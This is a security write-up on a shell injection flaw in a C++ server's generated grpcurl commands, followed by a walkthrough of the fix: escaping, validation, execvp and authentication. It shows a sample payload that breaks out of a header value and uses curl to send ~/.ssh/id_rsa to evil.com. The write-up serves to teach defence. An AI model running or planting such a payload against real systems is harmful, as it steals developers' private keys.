Shell Injection via Unsafe String Concatenation in gRPCurl Command Generation
Introduction
When developers build tools that generate shell commands for users to copy and run, they often treat those commands as inert strings — just text on a screen. But the moment user-controlled data enters that string without proper sanitization, you've handed an attacker a loaded weapon. This is exactly what happened in the gRPCurl command generation logic in src/distributed_server.cpp.
This vulnerability belongs to a class of bugs known as shell injection (or command injection), one of the most dangerous and persistent vulnerability families in software security. It's listed in the OWASP Top 10 under A03:2021 – Injection and is tracked under CWE-78: Improper Neutralization of Special Elements used in an OS Command.
If you're building distributed systems, developer tooling, or any code that constructs shell commands from dynamic data, this post is for you.
The Vulnerability Explained
What Went Wrong
The distributed server included a feature that auto-generated grpcurl commands — a convenient utility that lets developers inspect and interact with gRPC services from the command line. The idea is helpful: take the connection details (endpoint, headers, request data) and produce a ready-to-paste grpcurl invocation.
The problem? The code used unsafe string concatenation to build that command:
// ❌ VULNERABLE: Direct interpolation of user-controlled values
std::string command = "grpcurl -H '" + header_value + "' "
+ "-d '" + request_data + "' "
+ endpoint + " "
+ service_method;
Here, header_value, request_data, endpoint, and service_method all come from API responses — data that an attacker can potentially control. None of these values are escaped before being inserted into the shell command string.
How Shell Injection Works
Shell interpreters like bash and sh treat certain characters as special: single quotes ('), double quotes ("), backticks (`), dollar signs ($), semicolons (;), ampersands (&), pipes (|), and more. When these characters appear in a string that gets evaluated by a shell, they can break out of their intended context and introduce new commands.
Consider a malicious header_value like:
Authorization: Bearer token'; curl https://evil.com/exfil?data=$(cat ~/.ssh/id_rsa); echo '
When naively interpolated, the resulting command becomes:
grpcurl -H 'Authorization: Bearer token'; curl https://evil.com/exfil?data=$(cat ~/.ssh/id_rsa); echo '' -d '...' example.com:443 mypackage.MyService/MyMethod
What was supposed to be a single grpcurl invocation is now three separate shell commands:
1. A truncated (but executed) grpcurl call
2. A curl command that exfiltrates the user's SSH private key to an attacker-controlled server
3. A harmless echo to clean up the syntax
Real-World Attack Scenario
Here's how an end-to-end attack might look in practice:
- The attacker controls a gRPC server that the distributed server connects to, or holds a man-in-the-middle position on that connection.
- The malicious server returns crafted response headers or data containing shell metacharacters.
- The distributed server generates a gRPCurl command from this response and presents it to the developer.
- The developer, trusting the generated command, copies and pastes it into their terminal.
- The shell executes the injected commands with the developer's full privileges — accessing files, establishing reverse shells, exfiltrating credentials, or worse.
This is particularly insidious because the victim (the developer running the command) has no obvious reason to distrust a command their own tool generated. The payload is still present in the displayed text, but a carefully crafted one is easy to overlook inside a long header value.
Why This Is Rated High Severity
- Arbitrary code execution on the developer's machine
- No authentication bypass required — the attacker only needs to influence data that flows through the system
- Targets developers and operators, who typically have elevated privileges and access to sensitive credentials, infrastructure keys, and internal systems
- Difficult to detect — the malicious payload may be buried in a long header value or encoded in base64 and decoded at execution time
The Fix
What Changed
The fix was applied across three files:
- include/tcp_communication.h
- src/tcp_communication.cpp
- src/distributed_server.cpp
The core change introduces proper shell escaping for all user-controlled values before they are embedded in the generated command string. Additionally, the fix addresses a related issue: the TCP communication layer lacked authentication, meaning any client with network access could connect and send commands as a trusted node. Both issues were resolved together.
Shell Escaping: The Right Approach
A reliable way to include arbitrary user data in a shell command string is to single-quote the value and escape any single quotes within it. In POSIX shells such as sh and bash, a single-quoted string is taken literally: no variable expansion, no command substitution, no special characters. The only character that can end a single-quoted string is a single quote itself.
The escaping rule is:
1. Replace every ' in the value with '\'' (close the quote, insert a literal ', reopen the quote)
2. Wrap the entire value in single quotes
#include <string>
// ✅ Safe shell escaping function (POSIX single-quote rule)
std::string shell_escape(const std::string& input) {
    std::string escaped = "'";
    for (char c : input) {
        if (c == '\'') {
            escaped += "'\\''";  // End quote, escaped single quote, start quote
        } else {
            escaped += c;
        }
    }
    escaped += "'";
    return escaped;
}
Applied to the command generation:
// ✅ SAFE: All user-controlled values are escaped
std::string command = "grpcurl -H " + shell_escape(header_value) + " "
+ "-d " + shell_escape(request_data) + " "
+ shell_escape(endpoint) + " "
+ shell_escape(service_method);
Now, if an attacker provides the same malicious header_value as before:
Authorization: Bearer token'; curl https://evil.com/exfil?data=$(cat ~/.ssh/id_rsa); echo '
The escaped output becomes:
grpcurl -H 'Authorization: Bearer token'\''; curl https://evil.com/exfil?data=$(cat ~/.ssh/id_rsa); echo '\''' ...
The shell sees this as a single string argument to -H. The semicolons, the dollar sign, and the $(...) command substitution are all treated as literal characters, so the injection is neutralized.
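One way to gain confidence in an escaping function is a round-trip check: hand the escaped value to a real shell and confirm that the shell sees exactly the original bytes. The sketch below assumes a POSIX system with sh and printf available; round_trip is a hypothetical test helper, not part of the fix, and shell_escape is repeated only so the block stands on its own.

```cpp
#include <stdio.h>   // popen, pclose, fread (POSIX)
#include <string>

// Same rule as described above: wrap in single quotes and rewrite each
// embedded ' as '\'' (close quote, backslash-escaped quote, reopen quote).
std::string shell_escape(const std::string& input) {
    std::string escaped = "'";
    for (char c : input) {
        if (c == '\'') {
            escaped += "'\\''";
        } else {
            escaped += c;
        }
    }
    escaped += "'";
    return escaped;
}

// Hypothetical test helper: asks the shell to print the escaped value and
// returns what the shell actually received as the argument.
// Returns an empty string if the shell could not be started.
std::string round_trip(const std::string& value) {
    const std::string cmd = "printf '%s' " + shell_escape(value);
    std::string seen;
    FILE* pipe = popen(cmd.c_str(), "r");
    if (pipe == nullptr) {
        return seen;
    }
    char buf[256];
    size_t n;
    while ((n = fread(buf, 1, sizeof buf, pipe)) > 0) {
        seen.append(buf, n);
    }
    pclose(pipe);
    return seen;
}
```

If round_trip(value) ever differs from value, the escaping has a gap for that input. Values containing NUL bytes are out of scope here, since they cannot be passed as shell arguments at all.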
Addressing the Authentication Gap
The PR also fixed the underlying TCP communication layer, which accepted connections without any authentication. This is a defense-in-depth improvement: even if a future bug slips through, an unauthenticated attacker on the network can no longer reach the vulnerable code path in the first place.
Proper authentication for distributed node communication should include at minimum:
- Mutual TLS (mTLS) for transport-layer identity verification
- Token or shared-secret handshake at the application layer
- Per-connection session validation before processing any commands
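For the shared-secret option, one detail that is easy to get wrong is the comparison itself: an ordinary string comparison can return early on the first mismatching byte and leak timing information. The following is a minimal sketch of a comparison that avoids the early return. The name tokens_match is hypothetical, and the post does not say how the actual fix compares credentials; production code would normally rely on a vetted primitive such as OpenSSL's CRYPTO_memcmp rather than a hand-written loop.

```cpp
#include <cstddef>
#include <string>

// Hypothetical helper: compares a presented token with the expected shared
// secret without stopping at the first mismatching byte.
bool tokens_match(const std::string& presented, const std::string& expected) {
    // Fold the length difference and every byte difference into one value.
    std::size_t diff = presented.size() ^ expected.size();
    for (std::size_t i = 0; i < expected.size(); ++i) {
        // When `presented` is shorter, compare against a zero byte instead.
        const unsigned char p =
            i < presented.size() ? static_cast<unsigned char>(presented[i]) : 0;
        const unsigned char e = static_cast<unsigned char>(expected[i]);
        diff |= static_cast<std::size_t>(p ^ e);
    }
    return diff == 0;
}
```

The loop always runs over the full length of the expected secret, so the running time depends on that length but not on where the first difference occurs.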
Prevention & Best Practices
1. Never Interpolate Untrusted Data into Shell Commands
The golden rule: treat all external data as untrusted, even if it comes from your own infrastructure. API responses, database values, environment variables, file contents — any of these can be attacker-influenced under the right conditions.
2. Prefer APIs Over Shell Commands
When possible, avoid constructing shell commands altogether. Use native libraries or SDKs that interact with the underlying service directly:
// Instead of building a grpcurl shell command, use a gRPC C++ client library
// to make the call programmatically — no shell involved, no injection risk
grpc::ClientContext context;
context.AddMetadata("authorization", header_value); // Safe: no shell involved
auto stub = MyService::NewStub(channel);
stub->MyMethod(&context, request, &response);
3. Use Allowlists for Structured Inputs
For values like endpoints and service method names that have a known, restricted format, validate them against an allowlist or regex before use:
// Validate endpoint format before use (needs <regex> and <stdexcept>)
std::regex endpoint_pattern(R"(^[a-zA-Z0-9\.\-]+:\d{1,5}$)");
if (!std::regex_match(endpoint, endpoint_pattern)) {
    throw std::invalid_argument("Invalid endpoint format");
}
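The pattern above accepts any one to five digit port, including 0 and 99999, and does not cover the service method. A slightly stricter sketch might look like the following. Both function names are hypothetical, and the service method pattern assumes the package.Service/Method form used in the example earlier in this post.

```cpp
#include <regex>
#include <string>

// Hypothetical validator: host:port with the port limited to 1-65535.
bool is_valid_endpoint(const std::string& endpoint) {
    static const std::regex pattern(R"re(([a-zA-Z0-9.-]+):(\d{1,5}))re");
    std::smatch m;
    if (!std::regex_match(endpoint, m, pattern)) {
        return false;
    }
    const std::string host = m[1].str();
    if (host.front() == '-') {
        return false;  // a leading '-' could be parsed as a command-line flag
    }
    const int port = std::stoi(m[2].str());
    return port >= 1 && port <= 65535;
}

// Hypothetical validator: dotted identifiers, a slash, then a method name,
// for example mypackage.MyService/MyMethod.
bool is_valid_service_method(const std::string& name) {
    static const std::regex pattern(
        R"re([A-Za-z_][A-Za-z0-9_]*(\.[A-Za-z_][A-Za-z0-9_]*)*/[A-Za-z_][A-Za-z0-9_]*)re");
    return std::regex_match(name, pattern);
}
```

Because std::regex_match must match the whole string, a trailing payload such as "; id" causes the value to be rejected rather than truncated.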
4. Use execve Instead of system() or popen()
If you absolutely must invoke a subprocess, use execve() (or execvp()) with an argument array instead of passing a single shell command string to system() or popen(). This bypasses the shell entirely:
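#include <unistd.h>  // execvp
// ✅ No shell involved: arguments are passed directly to the program.
// execvp() replaces the current process image and returns only on failure,
// so it is normally called in a forked child.
const char* args[] = {
    "grpcurl",
    "-H", header_value.c_str(),
    "-d", request_data.c_str(),
    endpoint.c_str(),
    service_method.c_str(),
    nullptr
};
execvp(args[0], const_cast<char* const*>(args));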
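Because there's no shell to interpret metacharacters, shell injection is structurally impossible. Argument injection (CWE-88) is still possible if a value begins with a dash and the target program parses it as a flag, so validate inputs as well.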
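In a long-running server the exec call usually sits inside a forked child so the parent keeps running. The sketch below shows that pattern under POSIX assumptions: run_argv is a hypothetical helper that launches a program from an argument vector, captures its standard output through a pipe, and waits for it to exit. Error handling is reduced to returning an empty string.

```cpp
#include <string>
#include <vector>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

// Hypothetical helper: runs argv[0] with the given arguments, without a
// shell, and returns whatever the child wrote to stdout.
std::string run_argv(const std::vector<std::string>& argv) {
    if (argv.empty()) {
        return "";
    }
    // Build the null-terminated char* array that execvp expects.
    std::vector<char*> args;
    for (const std::string& a : argv) {
        args.push_back(const_cast<char*>(a.c_str()));
    }
    args.push_back(nullptr);

    int fds[2];
    if (pipe(fds) != 0) {
        return "";
    }
    const pid_t pid = fork();
    if (pid < 0) {
        close(fds[0]);
        close(fds[1]);
        return "";
    }
    if (pid == 0) {
        // Child: route stdout into the pipe, then replace the process image.
        dup2(fds[1], STDOUT_FILENO);
        close(fds[0]);
        close(fds[1]);
        execvp(args[0], args.data());
        _exit(127);  // reached only if execvp failed
    }
    // Parent: read until the child closes its end of the pipe.
    close(fds[1]);
    std::string output;
    char buf[256];
    ssize_t n;
    while ((n = read(fds[0], buf, sizeof buf)) > 0) {
        output.append(buf, static_cast<std::size_t>(n));
    }
    close(fds[0]);
    waitpid(pid, nullptr, 0);
    return output;
}
```

Calling run_argv({"echo", "x'; id; echo '$(id)"}) passes the quote, semicolons, and $(id) to echo as one literal argument; nothing in it is executed.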
5. Apply Defense in Depth
- Authenticate all network connections before processing any commands (as this PR also fixed)
- Run services with least privilege — a compromised process should have minimal access
- Log and monitor generated commands for anomalous patterns
- Code review all command-generation logic with an adversarial mindset
6. Use Static Analysis Tools
Several tools can catch this class of vulnerability automatically:
| Tool | Language | Notes |
|---|---|---|
| Semgrep | C/C++, many others | Rules for command injection patterns |
| CodeQL | C/C++, Java, Python, etc. | Taint tracking from source to sink |
| Flawfinder | C/C++ | Lightweight, fast, good for CI |
| Coverity | C/C++ | Enterprise-grade static analysis |
Integrate these into your CI/CD pipeline so injection vulnerabilities are caught before they reach production.
7. Security Standards & References
- OWASP Top 10 A03:2021 – Injection: https://owasp.org/www-project-top-ten/
- CWE-78 – Improper Neutralization of Special Elements used in an OS Command: https://cwe.mitre.org/data/definitions/78.html
- CWE-88 – Improper Neutralization of Argument Delimiters in a Command: https://cwe.mitre.org/data/definitions/88.html
- NIST SP 800-53 – SI-10: Information Input Validation
Conclusion
This vulnerability is a textbook example of why no external data should ever be trusted implicitly — especially when it's being woven into a shell command. The convenience of auto-generating grpcurl commands for developers came with a hidden cost: every user-controlled value in that command was a potential injection point.
The fix is conceptually simple — escape your inputs — but the lesson is broader:
If you're building a string that a shell will eventually interpret, treat every dynamic piece of that string as a potential attack vector.
Key takeaways for your own code:
- ✅ Escape all user-controlled data before shell interpolation
- ✅ Prefer native APIs and library calls over shell commands
- ✅ Use execve-style APIs to bypass the shell entirely when subprocess execution is necessary
- ✅ Authenticate all network connections before processing commands
- ✅ Add static analysis to your CI pipeline to catch injection patterns early
- ✅ Apply defense in depth — no single fix should be your only line of defense
Security is a habit, not a feature. Review your command-generation code today — you might be surprised what you find.
This vulnerability was identified and fixed as part of an automated security scanning and remediation pipeline. Automated tools are a force multiplier for security, but they work best when developers understand the underlying vulnerability classes. Stay curious, stay secure.